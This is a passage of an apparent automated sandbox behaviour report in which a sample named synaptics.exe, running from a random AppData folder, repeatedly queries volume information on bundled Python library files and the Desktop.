                Source: C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exeQueries volume information: C:\Users\user\AppData\Local\xFSOj9El1Q\Lib\io.py VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exeQueries volume information: C:\Users\user\AppData\Local\xFSOj9El1Q\Lib\io.py VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exeQueries volume information: C:\Users\user\AppData\Local\xFSOj9El1Q\Lib\__pycache__ VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exeQueries volume information: C:\Users\user\AppData\Local\xFSOj9El1Q\Lib\__pycache__\io.cpython-310.pyc.10054320 VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exeQueries volume information: C:\Users\user\AppData\Local\xFSOj9El1Q\DLLs VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exeQueries volume information: C:\Users\user\AppData\Local\xFSOj9El1Q\Lib VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exeQueries volume information: C:\Users\user\AppData\Local\xFSOj9El1Q\Lib\abc.py VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exeQueries volume information: C:\Users\user\AppData\Local\xFSOj9El1Q\Lib\abc.py VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exeQueries volume information: C:\Users\user\AppData\Local\xFSOj9El1Q\Lib\__pycache__\abc.cpython-310.pyc VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exeQueries volume information: C:\Users\user\AppData\Local\xFSOj9El1Q\Lib\__pycache__\abc.cpython-310.pyc VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exeQueries volume information: C:\Users\user\AppData\Local\xFSOj9El1Q\Lib\abc.py VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exeQueries volume information: C:\Users\user\AppData\Local\xFSOj9El1Q\Lib\abc.py VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exeQueries volume information: C:\Users\user\AppData\Local\xFSOj9El1Q\Lib\abc.py VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exeQueries volume information: C:\Users\user\AppData\Local\xFSOj9El1Q\Lib\__pycache__ VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exeQueries volume information: C:\Users\user\AppData\Local\xFSOj9El1Q\Lib\__pycache__\abc.cpython-310.pyc.10100208 VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exeQueries volume information: C:\Users\user\AppData\Local\xFSOj9El1Q\DLLs VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exeQueries volume information: C:\Users\user\AppData\Local\xFSOj9El1Q\Lib VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exeQueries volume information: C:\Users\user\AppData\Local\xFSOj9El1Q\Lib\site.py VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exeQueries volume information: C:\Users\user\AppData\Local\xFSOj9El1Q\Lib\site.py VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exeQueries volume information: C:\Users\user\AppData\Local\xFSOj9El1Q\Lib\__pycache__\site.cpython-310.pyc VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exeQueries volume information: C:\Users\user\AppData\Local\xFSOj9El1Q\Lib\__pycache__\site.cpython-310.pyc VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exeQueries volume information: C:\Users\user\AppData\Local\xFSOj9El1Q\Lib\site.py VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exeQueries volume information: C:\Users\user\AppData\Local\xFSOj9El1Q\Lib\site.py VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exeQueries volume information: C:\Users\user\AppData\Local\xFSOj9El1Q\Lib\site.py VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exeQueries volume information: C:\Users\user\AppData\Local\xFSOj9El1Q\Lib\__pycache__ VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exeQueries volume information: C:\Users\user\AppData\Local\xFSOj9El1Q\Lib\__pycache__\site.cpython-310.pyc.10099792 VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exeQueries volume information: C:\Users\user\AppData\Local\xFSOj9El1Q\DLLs VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exeQueries volume information: C:\Users\user\AppData\Local\xFSOj9El1Q\Lib VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exeQueries volume information: C:\Users\user\AppData\Local\xFSOj9El1Q\Lib\os.py VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exeQueries volume information: C:\Users\user\AppData\Local\xFSOj9El1Q\Lib\os.py VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exeQueries volume information: C:\Users\user\AppData\Local\xFSOj9El1Q\Lib\__pycache__\os.cpython-310.pyc VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exeQueries volume information: C:\Users\user\AppData\Local\xFSOj9El1Q\Lib\__pycache__\os.cpython-310.pyc VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exeQueries volume information: C:\Users\user\AppData\Local\xFSOj9El1Q\Lib\os.py VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exeQueries volume information: C:\Users\user\AppData\Local\xFSOj9El1Q\Lib\os.py VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exeQueries volume information: C:\Users\user\AppData\Local\xFSOj9El1Q\Lib\os.py VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exeQueries volume information: C:\Users\user\AppData\Local\xFSOj9El1Q\Lib\__pycache__ VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exeQueries volume information: C:\Users\user\AppData\Local\xFSOj9El1Q\Lib\__pycache__\os.cpython-310.pyc.10149776 VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exeQueries volume information: C:\Users\user\AppData\Local\xFSOj9El1Q\DLLs VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exeQueries volume information: C:\Users\user\AppData\Local\xFSOj9El1Q\Lib VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exeQueries volume information: C:\Users\user\AppData\Local\xFSOj9El1Q\Lib\stat.py VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exeQueries volume information: C:\Users\user\AppData\Local\xFSOj9El1Q\Lib\stat.py VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exeQueries volume information: C:\Users\user\AppData\Local\xFSOj9El1Q\Lib\__pycache__\stat.cpython-310.pyc VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exeQueries volume information: C:\Users\user\AppData\Local\xFSOj9El1Q\Lib\__pycache__\stat.cpython-310.pyc VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exeQueries volume information: C:\Users\user\AppData\Local\xFSOj9El1Q\Lib\stat.py VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exeQueries volume information: C:\Users\user\AppData\Local\xFSOj9El1Q\Lib\stat.py VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exeQueries volume information: C:\Users\user\AppData\Local\xFSOj9El1Q\Lib\stat.py VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exeQueries volume information: C:\Users\user\AppData\Local\xFSOj9El1Q\Lib\__pycache__ VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exeQueries volume information: C:\Users\user\AppData\Local\xFSOj9El1Q\Lib\__pycache__\stat.cpython-310.pyc.10493736 VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exeQueries volume information: C:\Users\user\AppData\Local\xFSOj9El1Q\Lib VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exeQueries volume information: C:\Users\user\AppData\Local\xFSOj9El1Q\Lib\_collections_abc.py VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exeQueries volume information: C:\Users\user\AppData\Local\xFSOj9El1Q\Lib\_collections_abc.py VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exeQueries volume information: C:\Users\user\AppData\Local\xFSOj9El1Q\Lib\__pycache__\_collections_abc.cpython-310.pyc VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exeQueries volume information: C:\Users\user\AppData\Local\xFSOj9El1Q\Lib\__pycache__\_collections_abc.cpython-310.pyc VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exeQueries volume information: C:\Users\user\AppData\Local\xFSOj9El1Q\Lib\_collections_abc.py VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exeQueries volume information: C:\Users\user\AppData\Local\xFSOj9El1Q\Lib\_collections_abc.py VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exeQueries volume information: C:\Users\user\AppData\Local\xFSOj9El1Q\Lib\_collections_abc.py VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exeQueries volume information: C:\Users\user\AppData\Local\xFSOj9El1Q\Lib\__pycache__ VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exeQueries volume information: C:\Users\user\AppData\Local\xFSOj9El1Q\Lib\__pycache__\_collections_abc.cpython-310.pyc.9333840 VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exeQueries volume information: C:\Users\user\AppData\Local\xFSOj9El1Q\DLLs VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exeQueries volume information: C:\Users\user\AppData\Local\xFSOj9El1Q\Lib\ntpath.py VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exeQueries volume information: C:\Users\user\AppData\Local\xFSOj9El1Q\Lib\ntpath.py VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exeQueries volume information: C:\Users\user\AppData\Local\xFSOj9El1Q\Lib\__pycache__\ntpath.cpython-310.pyc VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exeQueries volume information: C:\Users\user\AppData\Local\xFSOj9El1Q\Lib\__pycache__\ntpath.cpython-310.pyc VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exeQueries volume information: C:\Users\user\AppData\Local\xFSOj9El1Q\Lib\ntpath.py VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exeQueries volume information: C:\Users\user\AppData\Local\xFSOj9El1Q\Lib\ntpath.py VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exeQueries volume information: C:\Users\user\AppData\Local\xFSOj9El1Q\Lib\ntpath.py VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exeQueries volume information: C:\Users\user\AppData\Local\xFSOj9El1Q\Lib\__pycache__ VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exeQueries volume information: C:\Users\user\AppData\Local\xFSOj9El1Q\Lib\__pycache__\ntpath.cpython-310.pyc.10600792 VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exeQueries volume information: C:\Users\user\AppData\Local\xFSOj9El1Q\DLLs VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exeQueries volume information: C:\Users\user\AppData\Local\xFSOj9El1Q\Lib VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exeQueries volume information: C:\Users\user\AppData\Local\xFSOj9El1Q\Lib\genericpath.py VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exeQueries volume information: C:\Users\user\AppData\Local\xFSOj9El1Q\Lib\genericpath.py VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exeQueries volume information: C:\Users\user\AppData\Local\xFSOj9El1Q\Lib\__pycache__\genericpath.cpython-310.pyc VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exeQueries volume information: C:\Users\user\AppData\Local\xFSOj9El1Q\Lib\__pycache__\genericpath.cpython-310.pyc VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exeQueries volume information: C:\Users\user\AppData\Local\xFSOj9El1Q\Lib\genericpath.py VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exeQueries volume information: C:\Users\user\AppData\Local\xFSOj9El1Q\Lib\genericpath.py VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exeQueries volume information: C:\Users\user\AppData\Local\xFSOj9El1Q\Lib\genericpath.py VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exeQueries volume information: C:\Users\user\AppData\Local\xFSOj9El1Q\Lib\__pycache__ VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exeQueries volume information: C:\Users\user\AppData\Local\xFSOj9El1Q\Lib\__pycache__\genericpath.cpython-310.pyc.10329184 VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exeQueries volume information: C:\Users\user\AppData\Local\xFSOj9El1Q\DLLs VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exeQueries volume information: C:\Users\user\AppData\Local\xFSOj9El1Q\Lib VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exeQueries volume information: C:\Users\user\AppData\Local\xFSOj9El1Q\Lib\_sitebuiltins.py VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exeQueries volume information: C:\Users\user\AppData\Local\xFSOj9El1Q\Lib\_sitebuiltins.py VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exeQueries volume information: C:\Users\user\AppData\Local\xFSOj9El1Q\Lib\__pycache__\_sitebuiltins.cpython-310.pyc VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exeQueries volume information: C:\Users\user\AppData\Local\xFSOj9El1Q\Lib\__pycache__\_sitebuiltins.cpython-310.pyc VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exeQueries volume information: C:\Users\user\AppData\Local\xFSOj9El1Q\Lib\_sitebuiltins.py VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exeQueries volume information: C:\Users\user\AppData\Local\xFSOj9El1Q\Lib\_sitebuiltins.py VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exeQueries volume information: C:\Users\user\AppData\Local\xFSOj9El1Q\Lib\_sitebuiltins.py VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exeQueries volume information: C:\Users\user\AppData\Local\xFSOj9El1Q\Lib\__pycache__ VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exeQueries volume information: C:\Users\user\AppData\Local\xFSOj9El1Q\Lib\__pycache__\_sitebuiltins.cpython-310.pyc.10473504 VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exeQueries volume information: C:\Users\user\AppData\Local\xFSOj9El1Q VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exeQueries volume information: C:\Users\user\AppData\Local\xFSOj9El1Q\Lib\site-packages\distutils-precedence.pth VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exeQueries volume information: C:\Users\user\AppData\Local\xFSOj9El1Q\DLLs VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exeQueries volume information: C:\Users\user\AppData\Local\xFSOj9El1Q VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exeQueries volume information: C:\Users\user\AppData\Local\xFSOj9El1Q VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exeQueries volume information: C:\Users\user\AppData\Local\xFSOj9El1Q VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exeQueries volume information: C:\Users\user\AppData\Local\xFSOj9El1Q\Lib\site-packages VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exeQueries volume information: C:\Users\user\AppData\Local\xFSOj9El1Q\Lib\site-packages VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exeQueries volume information: C:\Users\user\AppData\Local\xFSOj9El1Q\Lib\site-packages VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exeQueries volume information: C:\Users\user\AppData\Local\xFSOj9El1Q\Lib\site-packages\_distutils_hack\__init__.py VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exeQueries volume information: C:\Users\user\AppData\Local\xFSOj9El1Q\Lib\site-packages\_distutils_hack\__init__.py VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exeQueries volume information: C:\Users\user\AppData\Local\xFSOj9El1Q\Lib\site-packages\_distutils_hack\__pycache__\__init__.cpython-310.pyc VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exeQueries volume information: C:\Users\user\AppData\Local\xFSOj9El1Q\Lib\site-packages\_distutils_hack\__pycache__\__init__.cpython-310.pyc VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exeQueries volume information: C:\Users\user\AppData\Local\xFSOj9El1Q\Lib\site-packages\_distutils_hack\__init__.py VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exeQueries volume information: C:\Users\user\AppData\Local\xFSOj9El1Q\Lib\site-packages\_distutils_hack\__init__.py VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exeQueries volume information: C:\Users\user\AppData\Local\xFSOj9El1Q\Lib\site-packages\_distutils_hack\__init__.py VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exeQueries volume information: C:\Users\user\AppData\Local\xFSOj9El1Q\Lib\site-packages\_distutils_hack\__pycache__ VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exeQueries volume information: C:\Users\user\AppData\Local\xFSOj9El1Q\Lib\site-packages\_distutils_hack\__pycache__\__init__.cpython-310.pyc.10416160 VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exeQueries volume information: C:\Users\user\AppData\Local\xFSOj9El1Q\Lib\site-packages\pywin32.pth VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exeQueries volume information: C:\Users\user\AppData\Local\xFSOj9El1Q\Lib\site-packages\win32 VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exeQueries volume information: C:\Users\user\AppData\Local\xFSOj9El1Q\Lib\site-packages\win32\lib VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exeQueries volume information: C:\Users\user\AppData\Local\xFSOj9El1Q\Lib\site-packages\pythonwin VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exeQueries volume information: C:\Users\user\AppData\Local\xFSOj9El1Q\DLLs VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exeQueries volume information: C:\Users\user\AppData\Local\xFSOj9El1Q\Lib VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exeQueries volume information: C:\Users\user\AppData\Local\xFSOj9El1Q VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exeQueries volume information: C:\Users\user\AppData\Local\xFSOj9El1Q\Lib\site-packages VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exeQueries volume information: C:\Users\user\AppData\Local\xFSOj9El1Q\Lib\site-packages\win32 VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exeQueries volume information: C:\Users\user\AppData\Local\xFSOj9El1Q\Lib\site-packages\win32 VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exeQueries volume information: C:\Users\user\AppData\Local\xFSOj9El1Q\Lib\site-packages\win32 VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exeQueries volume information: C:\Users\user\AppData\Local\xFSOj9El1Q\Lib\site-packages\win32\lib VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exeQueries volume information: C:\Users\user\AppData\Local\xFSOj9El1Q\Lib\site-packages\win32\lib VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exeQueries volume information: C:\Users\user\AppData\Local\xFSOj9El1Q\Lib\site-packages\win32\lib VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exeQueries volume information: C:\Users\user\AppData\Local\xFSOj9El1Q\Lib\site-packages\win32\lib\pywin32_bootstrap.py VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exeQueries volume information: C:\Users\user\AppData\Local\xFSOj9El1Q\Lib\site-packages\win32\lib\pywin32_bootstrap.py VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exeQueries volume information: C:\Users\user\AppData\Local\xFSOj9El1Q\Lib\site-packages\win32\lib\__pycache__\pywin32_bootstrap.cpython-310.pyc VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exeQueries volume information: C:\Users\user\AppData\Local\xFSOj9El1Q\Lib\site-packages\win32\lib\__pycache__\pywin32_bootstrap.cpython-310.pyc VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exeQueries volume information: C:\Users\user\AppData\Local\xFSOj9El1Q\Lib\site-packages\win32\lib\pywin32_bootstrap.py VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exeQueries volume information: C:\Users\user\AppData\Local\xFSOj9El1Q\Lib\site-packages\win32\lib\pywin32_bootstrap.py VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exeQueries volume information: C:\Users\user\AppData\Local\xFSOj9El1Q\Lib\site-packages\win32\lib\pywin32_bootstrap.py VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exeQueries volume information: C:\Users\user\AppData\Local\xFSOj9El1Q\Lib\site-packages\win32\lib\__pycache__ VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exeQueries volume information: C:\Users\user\AppData\Local\xFSOj9El1Q\Lib\site-packages\win32\lib\__pycache__\pywin32_bootstrap.cpython-310.pyc.9325984 VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exeQueries volume information: C:\Users\user\AppData\Local\xFSOj9El1Q\DLLs VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exeQueries volume information: C:\Users\user\AppData\Local\xFSOj9El1Q\Lib VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exeQueries volume information: C:\Users\user\AppData\Local\xFSOj9El1Q VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exeQueries volume information: C:\Users\user\AppData\Local\xFSOj9El1Q\Lib\site-packages\pywin32_system32 VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exeQueries volume information: C:\Users\user\AppData\Local\xFSOj9El1Q\Lib\site-packages\win32 VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exeQueries volume information: C:\Users\user\AppData\Local\xFSOj9El1Q\Lib\site-packages\pythonwin VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exeQueries volume information: C:\Users\user\AppData\Local\xFSOj9El1Q\Lib\site-packages\pythonwin VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exeQueries volume information: C:\Users\user\AppData\Local\xFSOj9El1Q\Lib\site-packages\pythonwin VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exeQueries volume information: C:\Users\user\AppData\Local\xFSOj9El1Q\Lib\site-packages\pywin32_system32 VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exeQueries volume information: C:\Users\user\AppData\Local\xFSOj9El1Q\DLLs VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exeQueries volume information: C:\Users\user\AppData\Local\xFSOj9El1Q\Lib VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exeQueries volume information: C:\Users\user\AppData\Local\xFSOj9El1Q VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exeQueries volume information: C:\Users\user\AppData\Local\xFSOj9El1Q\Lib\site-packages VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exeQueries volume information: C:\Users\user\AppData\Local\xFSOj9El1Q VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exeQueries volume information: C:\Users\user\AppData\Local\xFSOj9El1Q\Lib\site-packages VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exeQueries volume information: C:\Users\user\AppData\Local\xFSOj9El1Q\Lib\site-packages\pythonwin VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exeQueries volume information: C:\Users\user\Desktop VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exeQueries volume information: C:\Users\user\Desktop VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exeQueries volume information: C:\Users\user\Desktop VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exeQueries volume information: C:\Users\user\AppData\Local\xFSOj9El1Q\DLLs VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exeQueries volume information: C:\Users\user\AppData\Local\xFSOj9El1Q\Lib VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exeQueries volume information: C:\Users\user\AppData\Local\xFSOj9El1Q\Lib\base64.py VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exeQueries volume information: C:\Users\user\AppData\Local\xFSOj9El1Q\Lib\base64.py VolumeInformationJump to behavior
